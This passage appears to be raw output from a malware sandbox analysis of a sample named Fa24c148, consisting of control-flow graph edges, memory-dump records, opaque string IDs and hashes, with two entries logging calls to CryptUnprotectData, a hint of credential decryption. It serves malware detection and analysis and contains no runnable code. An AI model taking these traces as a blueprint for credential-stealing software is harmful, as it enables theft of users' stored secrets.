1756->1764 1765 167472-167476 1757->1765 1766 16744f-167457 1757->1766 1758->1723 1759->1748 1763 16728a-167290 1759->1763 1760->1748 1767 1674f0-1674f3 1761->1767 1768 1674ad-1674b2 1761->1768 1762->1748 1769 167296-167298 1763->1769 1770 167292-167294 1763->1770 1772 167246-16726e 1764->1772 1773 167235-167240 1764->1773 1765->1736 1774 167478-16747e 1765->1774 1766->1723 1771 16745d-16746c 1766->1771 1767->1758 1775 1674f5-1674fa 1767->1775 1768->1758 1776 1674b4 1768->1776 1777 1672a2-1672b9 1769->1777 1770->1777 1771->1728 1771->1765 1796 167274-167279 1772->1796 1797 167362-167398 1772->1797 1773->1748 1773->1772 1774->1721 1774->1736 1775->1720 1775->1742 1778 1674bb-1674c0 1776->1778 1789 1672e4-16730b 1777->1789 1790 1672bb-1672d4 1777->1790 1779 1674e2-1674e4 1778->1779 1780 1674c2-1674c4 1778->1780 1779->1758 1787 1674e6-1674e9 1779->1787 1784 1674c6-1674cb 1780->1784 1785 1674d3-1674d9 1780->1785 1784->1785 1785->1723 1788 1674db-1674e0 1785->1788 1787->1767 1788->1779 1792 1674b6-1674b9 1788->1792 1789->1758 1800 167311-167314 1789->1800 1790->1797 1801 1672da-1672df 1790->1801 1792->1758 1792->1778 1796->1797 1803 1673a5-1673ad 1797->1803 1804 16739a-16739e 1797->1804 1800->1758 1805 16731a-167343 1800->1805 1801->1797 1803->1758 1808 1673b3-1673b8 1803->1808 1806 1673a0-1673a3 1804->1806 1807 1673bd-1673c1 1804->1807 1805->1797 1820 167345-16734a 1805->1820 1806->1803 1806->1807 1809 1673c3-1673c9 1807->1809 1810 1673e0-1673e4 1807->1810 1808->1748 1809->1810 1812 1673cb-1673d3 1809->1812 1813 1673e6-1673ec 1810->1813 1814 1673ee-16740d call 1676f1 1810->1814 1812->1758 1815 1673d9-1673de 1812->1815 1813->1814 1817 167413-167417 1813->1817 1814->1817 1815->1748 1817->1748 1818 167419-167435 1817->1818 1818->1748 1820->1797 1821->1701 1822->1701 1823->1701 1824->1690 1825->1690
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2928164859.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_160000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (o^q$(o^q$,bq$,bq
                                                                                                    • API String ID: 0-879173519
                                                                                                    • Opcode ID: fc24d5868451c82a8c764a894d43927f83c28ff5959cb92139f76cd18539a964
                                                                                                    • Instruction ID: 06884e5f6df88911cdc07ec6bc8c3ce7b41505920d052501f1e678e43910ad60
                                                                                                    • Opcode Fuzzy Hash: fc24d5868451c82a8c764a894d43927f83c28ff5959cb92139f76cd18539a964
                                                                                                    • Instruction Fuzzy Hash: B3025F70A04219DFCB15CF69CD88AAEBBB2FF49304F258469E815AB3A1DB30DD51CB51
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2928164859.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_160000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (o^q$4'^q
                                                                                                    • API String ID: 0-273632683
                                                                                                    • Opcode ID: 2f25b909dc7ce8e4fe4c1f128458474777905ab6e81124240d8e6d9e03469993
                                                                                                    • Instruction ID: 6d24fc2feda2f1c0ab9ae76d9d4f7fc2bb2ab1439cd5af9ded69c0f354d57d40
                                                                                                    • Opcode Fuzzy Hash: 2f25b909dc7ce8e4fe4c1f128458474777905ab6e81124240d8e6d9e03469993
                                                                                                    • Instruction Fuzzy Hash: 4F827075A00209DFCB15CFA8C994AAEBBF2FF88310F55855AE406AB261D730ED91CF51
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2928164859.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_160000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: PH^q$PH^q
                                                                                                    • API String ID: 0-1598597984
                                                                                                    • Opcode ID: d43030d3d02855f2ba5a5a0fc82c33ed8fab905acd6bc3e78a720c33edf3ae79
                                                                                                    • Instruction ID: 154c8e9ea3b3a37fd1cd744f17cb3846e261d84259b202ca99bd00ae8653b61f
                                                                                                    • Opcode Fuzzy Hash: d43030d3d02855f2ba5a5a0fc82c33ed8fab905acd6bc3e78a720c33edf3ae79
                                                                                                    • Instruction Fuzzy Hash: EBA10874E05258CFDB14DFA9D884AADBBF2BF89300F15806AE448AB365DB319D41CF50
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2928164859.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_160000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: ,bq$,bq
                                                                                                    • API String ID: 0-2699258169
                                                                                                    • Opcode ID: 82c66e81ecbf566fa4d0d4e3205bb9fc3420af2fab9b6d7a84aa54aca2670f1b
                                                                                                    • Instruction ID: e38356bb63319b365aa304a5bd666df46c1554d6a1536ab522e7696d7ff15799
                                                                                                    • Opcode Fuzzy Hash: 82c66e81ecbf566fa4d0d4e3205bb9fc3420af2fab9b6d7a84aa54aca2670f1b
                                                                                                    • Instruction Fuzzy Hash: A1819074A00505DFCB18CF69DC849AABBB2FF89305B258169D406EB379DB31EC61CB51
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2928164859.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_160000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: PH^q$PH^q
                                                                                                    • API String ID: 0-1598597984
                                                                                                    • Opcode ID: 56eacda3e3e1d7009a40981a2ce11ac509e926353aabcd279d093eecf0e2adf3
                                                                                                    • Instruction ID: 62f9620ff849b012b32f6664a03897baa764cc0845e3193450c89e2186959336
                                                                                                    • Opcode Fuzzy Hash: 56eacda3e3e1d7009a40981a2ce11ac509e926353aabcd279d093eecf0e2adf3
                                                                                                    • Instruction Fuzzy Hash: 3E91C774E00658CFDB18DFAAD984A9DBBF2BF89300F149069E409AB365DB309985CF50
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2928164859.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_160000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: PH^q$PH^q
                                                                                                    • API String ID: 0-1598597984
                                                                                                    • Opcode ID: a937162cb439576cf4235043b895e4fccb24659fa6976e4c2c402acfb0e80d80
                                                                                                    • Instruction ID: 0ba6f844cc3d6045e6768908fa6e75bd008f3c820c903f140e67b5c6d132df71
                                                                                                    • Opcode Fuzzy Hash: a937162cb439576cf4235043b895e4fccb24659fa6976e4c2c402acfb0e80d80
                                                                                                    • Instruction Fuzzy Hash: 0281D674E00218CFDB18DFAAD984A9DBBF2BF89300F14D069E459AB365DB309945CF54
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2928164859.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_160000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: PH^q$PH^q
                                                                                                    • API String ID: 0-1598597984
                                                                                                    • Opcode ID: f579d32736e11a2170d734481a78f6d167bd102229a7f5df12b52d0aa1205b7d
                                                                                                    • Instruction ID: cdf7c1fbb2136ed476cb28f4a76d4500f0df04f855d28bab73fb41bf61e989bd
                                                                                                    • Opcode Fuzzy Hash: f579d32736e11a2170d734481a78f6d167bd102229a7f5df12b52d0aa1205b7d
                                                                                                    • Instruction Fuzzy Hash: 5481D574E00218DFDB18DFAAD884A9DBBF2BF89300F14C069E459AB365DB319985CF50
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2928164859.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_160000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: PH^q$PH^q
                                                                                                    • API String ID: 0-1598597984
                                                                                                    • Opcode ID: 6585bbc32d4252ba2df6afca5371551b5a507cc25506e07ce62d2c5023e338a9
                                                                                                    • Instruction ID: 62d98e5e9d394abcef41ba701bcf13011b99df84ec94b4257170a2eb350fb7c2
                                                                                                    • Opcode Fuzzy Hash: 6585bbc32d4252ba2df6afca5371551b5a507cc25506e07ce62d2c5023e338a9
                                                                                                    • Instruction Fuzzy Hash: FC81A274E01218CFDB18DFAAD884A9DBBF2BF89300F149069E819AB365DB349D45CF50
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2928164859.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_160000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: PH^q$PH^q
                                                                                                    • API String ID: 0-1598597984
                                                                                                    • Opcode ID: 661c557fb2cc6ee7294530dcc39b574bc8791f57748ea1c19f5e2d422a5a56ff
                                                                                                    • Instruction ID: 44959b0859246a0a5125fc637e2db1d73c0202170014b13ff8c896c5ade7de1b
                                                                                                    • Opcode Fuzzy Hash: 661c557fb2cc6ee7294530dcc39b574bc8791f57748ea1c19f5e2d422a5a56ff
                                                                                                    • Instruction Fuzzy Hash: 8381C474E00218CFDB18DFAAD984A9DBBF2BF89304F14D069E458AB365DB349945CF50
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2928164859.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_160000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: PH^q$PH^q
                                                                                                    • API String ID: 0-1598597984
                                                                                                    • Opcode ID: 05ede2e2718a9fb038b947da62be3990ce92349d236e1b7a618702a5a6af0f55
                                                                                                    • Instruction ID: 965a5368eecd05cf3d258e5f77e2e999ba112d2b3798eb5d4c4730aa97ec25fe
                                                                                                    • Opcode Fuzzy Hash: 05ede2e2718a9fb038b947da62be3990ce92349d236e1b7a618702a5a6af0f55
                                                                                                    • Instruction Fuzzy Hash: 8881B774E01218CFDB14DFAAD884AADBBF2BF89300F14C069E459AB365DB355945CF50
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2928164859.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_160000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: PH^q$PH^q
                                                                                                    • API String ID: 0-1598597984
                                                                                                    • Opcode ID: 1b13020a67205f0ecfe397991af3f3a05e99ce6c6e065399ccd563520975dba0
                                                                                                    • Instruction ID: 5c3b2b0f153e97212b48f5b70328258265a5941100a984669c4ec862133cee6e
                                                                                                    • Opcode Fuzzy Hash: 1b13020a67205f0ecfe397991af3f3a05e99ce6c6e065399ccd563520975dba0
                                                                                                    • Instruction Fuzzy Hash: 0281B874E00218CFDB18DFAAD984A9DBBF2BF89300F14D069E819AB365DB749945CF50
                                                                                                    APIs
                                                                                                    • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 35E68F5D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2955573596.0000000035E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 35E60000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_35e60000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CryptDataUnprotect
                                                                                                    • String ID:
                                                                                                    • API String ID: 834300711-0
                                                                                                    • Opcode ID: 84575daf4c22f3a69aa5adb83ce38e33993dce4c8516539a16e02673c56e72a9
                                                                                                    • Instruction ID: 095d604114a7b4dfb60dc8e9627aff7db7926cae6c8f19fbbcb32f317516230b
                                                                                                    • Opcode Fuzzy Hash: 84575daf4c22f3a69aa5adb83ce38e33993dce4c8516539a16e02673c56e72a9
                                                                                                    • Instruction Fuzzy Hash: D41156B2804259DFDB10CF99C845BDEBFF5EF48320F10841AEA58A7211C775AA50DFA5
                                                                                                    APIs
                                                                                                    • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 35E68F5D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2955573596.0000000035E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 35E60000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_35e60000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CryptDataUnprotect
                                                                                                    • String ID:
                                                                                                    • API String ID: 834300711-0
                                                                                                    • Opcode ID: c50c76ecadfee73972a36cae1140e4a61b6bc9cee7f1ae391d0c74fb928147db
                                                                                                    • Instruction ID: d2495023563c5c1afca0d8ab7ddcfb6198ac68ba0af479737f6db6f455c141e3
                                                                                                    • Opcode Fuzzy Hash: c50c76ecadfee73972a36cae1140e4a61b6bc9cee7f1ae391d0c74fb928147db
                                                                                                    • Instruction Fuzzy Hash: A01167B2800249DFDB10CF99C945BDEBFF5EF48320F10841AE958A7211C335A650DFA5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2956050543.00000000367E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 367E0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_367e0000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 8eca0823753f09973268003deadc76308f0f106517e2d2d0c75b892a2cba34a1
                                                                                                    • Instruction ID: 36852091ceaa442cd2129b16e29196af695f293b71bd647bd55faad6ea256094
                                                                                                    • Opcode Fuzzy Hash: 8eca0823753f09973268003deadc76308f0f106517e2d2d0c75b892a2cba34a1
                                                                                                    • Instruction Fuzzy Hash: F2825C74E012289FDB64DF69C994BDDBBB2BF89301F1081EAA40DA7265DB315E85CF40
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2955195873.0000000035780000.00000040.00000800.00020000.00000000.sdmp, Offset: 35780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_35780000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: eb27cf3758f4abdcb08c8d9c6d4bec057674f38483046209588c172299b4275c
                                                                                                    • Instruction ID: c781443904ba4f6be31a8348e6df0412771190ab8216e3628f0a87d69e252098
                                                                                                    • Opcode Fuzzy Hash: eb27cf3758f4abdcb08c8d9c6d4bec057674f38483046209588c172299b4275c
                                                                                                    • Instruction Fuzzy Hash: 38F1D174E01218CFDB14DFA9D884B9DBBB2BF88304F54C1A9E808AB355DB75A985CF50
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2955573596.0000000035E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 35E60000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_35e60000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9e697a747143ca4621c2e7cfbf549284b415888838cc505b2830dd1f3da9d6a2
                                                                                                    • Instruction ID: f8132b84e067afce673671966de11fa2a9f603ca9bbc9b164e9fe9d3987ef1c8
                                                                                                    • Opcode Fuzzy Hash: 9e697a747143ca4621c2e7cfbf549284b415888838cc505b2830dd1f3da9d6a2
                                                                                                    • Instruction Fuzzy Hash: 27E1AE74E01218DFEB54CFA5C944B9DBBB2BF89304F2081A9D409BB3A5DB355A85CF14
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2955971809.00000000367B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 367B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_367b0000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 17bad5964b0362d58bbbbe4ee48a6fa3e6b06e9c34db40f5f868ce935319168c
                                                                                                    • Instruction ID: b34d8001b6b29b8ad6d525523c890a525d8d43ddd764cffb934948206e64d599
                                                                                                    • Opcode Fuzzy Hash: 17bad5964b0362d58bbbbe4ee48a6fa3e6b06e9c34db40f5f868ce935319168c
                                                                                                    • Instruction Fuzzy Hash: 9BD18E74E00218CFDB54DFA5C994B9DBBB2BF89300F6081A9E409AB364DB359E85CF54
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2956079241.00000000367F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 367F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_367f0000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 96a028f6603b0c1e2241d572d51ce0d7536f2f63259874aaf66d40459929699d
                                                                                                    • Instruction ID: e1d4688cbafdb4c305ee41917de22070b44b2ccc21bcedec77a8e38698bcac78
                                                                                                    • Opcode Fuzzy Hash: 96a028f6603b0c1e2241d572d51ce0d7536f2f63259874aaf66d40459929699d
                                                                                                    • Instruction Fuzzy Hash: 54D19E74E00218CFDB54DFA5C994B9DBBB2BF89300F6081A9E408AB364DB359E85CF54
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2956079241.00000000367F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 367F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_367f0000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ce334c8f2f9e2cc9d39ca73e2078324a0efe54c7ecfbe3854816e6be4639bc6e
                                                                                                    • Instruction ID: c52a1b6bd2d478daa3e8fa2780dbf53a91934c29df7b4e76e0e00056cf498ee1
                                                                                                    • Opcode Fuzzy Hash: ce334c8f2f9e2cc9d39ca73e2078324a0efe54c7ecfbe3854816e6be4639bc6e
                                                                                                    • Instruction Fuzzy Hash: 4CD18E74E00218CFEB54DFA5C994B9DBBB2BF89300F6081A9D409AB364DB359E85CF54
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2955573596.0000000035E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 35E60000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_35e60000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5f359c73530b42e4d917b11c5f369597e389459704d80718274783e77949e71c
                                                                                                    • Instruction ID: 304b71f192a4f0e87e7fc0ec3689e250290a0c15594f7efc3d9c8a16e8d1a33f
                                                                                                    • Opcode Fuzzy Hash: 5f359c73530b42e4d917b11c5f369597e389459704d80718274783e77949e71c
                                                                                                    • Instruction Fuzzy Hash: 87D18D74E00218DFDB54DFA5C994B9DBBB2AF89300F1081A9D809BB364DB355D86CF15
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2955195873.0000000035780000.00000040.00000800.00020000.00000000.sdmp, Offset: 35780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_35780000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f40ab24a78fadc363a5664dfc07a2830030bb94635bd777742291f6a9775d43f
                                                                                                    • Instruction ID: 2fdd9a15313df0c32c066b34eafc5edf3307aab7dc7d50bc13e422edc61e7b13
                                                                                                    • Opcode Fuzzy Hash: f40ab24a78fadc363a5664dfc07a2830030bb94635bd777742291f6a9775d43f
                                                                                                    • Instruction Fuzzy Hash: A8C19074E00218DFDB14DFA5C945B9DBBB2FF88301F1081A9E809AB365DB359A86CF50
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2955195873.0000000035780000.00000040.00000800.00020000.00000000.sdmp, Offset: 35780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_35780000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e6b0f81cac66fcd410cb78201401fc20ee64960a2e73fef11e7ff2350c3b171c
                                                                                                    • Instruction ID: 2a5a12f2c7bf33e56f8f14859f5939d1affec9e8f716af3ed1de488dbf7a5118
                                                                                                    • Opcode Fuzzy Hash: e6b0f81cac66fcd410cb78201401fc20ee64960a2e73fef11e7ff2350c3b171c
                                                                                                    • Instruction Fuzzy Hash: A9C19E74E00218DFDB14DFA5C985B9DBBB2BF89300F2081A9D809AB365DB359E85CF51
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2956210818.0000000036830000.00000040.00000800.00020000.00000000.sdmp, Offset: 36830000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_36830000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 2240c999454aa0d2b68f2e4556887f5ce712e5e3a25a79b9801867ffca0d384d
                                                                                                    • Instruction ID: 889a0d98deaf98781e3227b263c5370781e84bdd593609f532f0ab62db515f9e
                                                                                                    • Opcode Fuzzy Hash: 2240c999454aa0d2b68f2e4556887f5ce712e5e3a25a79b9801867ffca0d384d
                                                                                                    • Instruction Fuzzy Hash: 99914B75D01619DFEB04AFA0C8987EEBBB1FB5A306F105419E102772E1CB784A45CFA9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2956210818.0000000036830000.00000040.00000800.00020000.00000000.sdmp, Offset: 36830000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_36830000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9bdcf0fec8606cf5cabab594dcbe76cbc8c570d7b09ec839a1e8976a7cdb0bb5
                                                                                                    • Instruction ID: 159a82e3d06dfef49cc1b3ab64e8613806731082389569974c048231003e527c
                                                                                                    • Opcode Fuzzy Hash: 9bdcf0fec8606cf5cabab594dcbe76cbc8c570d7b09ec839a1e8976a7cdb0bb5
                                                                                                    • Instruction Fuzzy Hash: A8914B75D01619DFEB04AFA0C8987EEBBB5FB5A306F105419E102772D0CB784A45CF99
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2955195873.0000000035780000.00000040.00000800.00020000.00000000.sdmp, Offset: 35780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_35780000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5943cbff19675470728f8763b11f67bd99d3db65bc121c083bdcaebf9475ead7
                                                                                                    • Instruction ID: a5ac9fe1b55ab7711ae672906418826af51e5461544012ad12afbc3101e239da
                                                                                                    • Opcode Fuzzy Hash: 5943cbff19675470728f8763b11f67bd99d3db65bc121c083bdcaebf9475ead7
                                                                                                    • Instruction Fuzzy Hash: 5AA1F474E002088FDB14DFA9C985BDDBBB1FF88314F209269E409BB2A1DB749985CF55
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2955195873.0000000035780000.00000040.00000800.00020000.00000000.sdmp, Offset: 35780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_35780000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 382cb0e531bf4fed600cd879b601ab6b601634c743ec85df2e1edb516fc61197
                                                                                                    • Instruction ID: 4593adcd20622ff8aecf364ef4fc5bfe607870044e9e01f4936bf8d3f8b27c09
                                                                                                    • Opcode Fuzzy Hash: 382cb0e531bf4fed600cd879b601ab6b601634c743ec85df2e1edb516fc61197
                                                                                                    • Instruction Fuzzy Hash: 0BA1A2B4E012288FEB64CF6AC944B9DFBF2BF88301F14C1A9D409AB254DB745A85CF51
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2955195873.0000000035780000.00000040.00000800.00020000.00000000.sdmp, Offset: 35780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_35780000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1364bbbb9b347b45b919c1d41d6f8af1c7d440855eea8bccf82efd0d3e4db3e2
                                                                                                    • Instruction ID: 3ed73a9074547dbcd6de9954f5be2323854d0b9462f107e8ebb985151a498cbc
                                                                                                    • Opcode Fuzzy Hash: 1364bbbb9b347b45b919c1d41d6f8af1c7d440855eea8bccf82efd0d3e4db3e2
                                                                                                    • Instruction Fuzzy Hash: 72A192B5E01269CFEB64CF6AC944B9DBBF2BF88300F14D1A9D408A7250DB745A85CF51
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2955195873.0000000035780000.00000040.00000800.00020000.00000000.sdmp, Offset: 35780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_35780000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 3f59ecac0d81f4acf0e06ab953c84ebd7454455b5a1acefe6649eb0319d5c568
                                                                                                    • Instruction ID: ca3a771e752e125d7c54ec5d75263103c61279f779d2ce1db2ee92e8c8f820be
                                                                                                    • Opcode Fuzzy Hash: 3f59ecac0d81f4acf0e06ab953c84ebd7454455b5a1acefe6649eb0319d5c568
                                                                                                    • Instruction Fuzzy Hash: 8F91E574D002088FDB14DFA9C985BDDBBB1FF88304F209269E409BB2A1DB759985CF54
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2955195873.0000000035780000.00000040.00000800.00020000.00000000.sdmp, Offset: 35780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_35780000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e47f9b3817d26da1fd818d80264eea822dcbf88653f76e492cf896e8696227de
                                                                                                    • Instruction ID: c74af24c2c013b1eea65fa57b9107c714e107123bc26a4bbfa89d90ddd33a1bd
                                                                                                    • Opcode Fuzzy Hash: e47f9b3817d26da1fd818d80264eea822dcbf88653f76e492cf896e8696227de
                                                                                                    • Instruction Fuzzy Hash: B491F374D00608CFEB10DFA9C889B9CBBB1FF49314F209269E409BB291DB759985CF14
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2955195873.0000000035780000.00000040.00000800.00020000.00000000.sdmp, Offset: 35780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_35780000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 0235cdf3f965ccf02b0fc3f66a40559b7bc0dfea10bfec40978b6cb72b5a8545
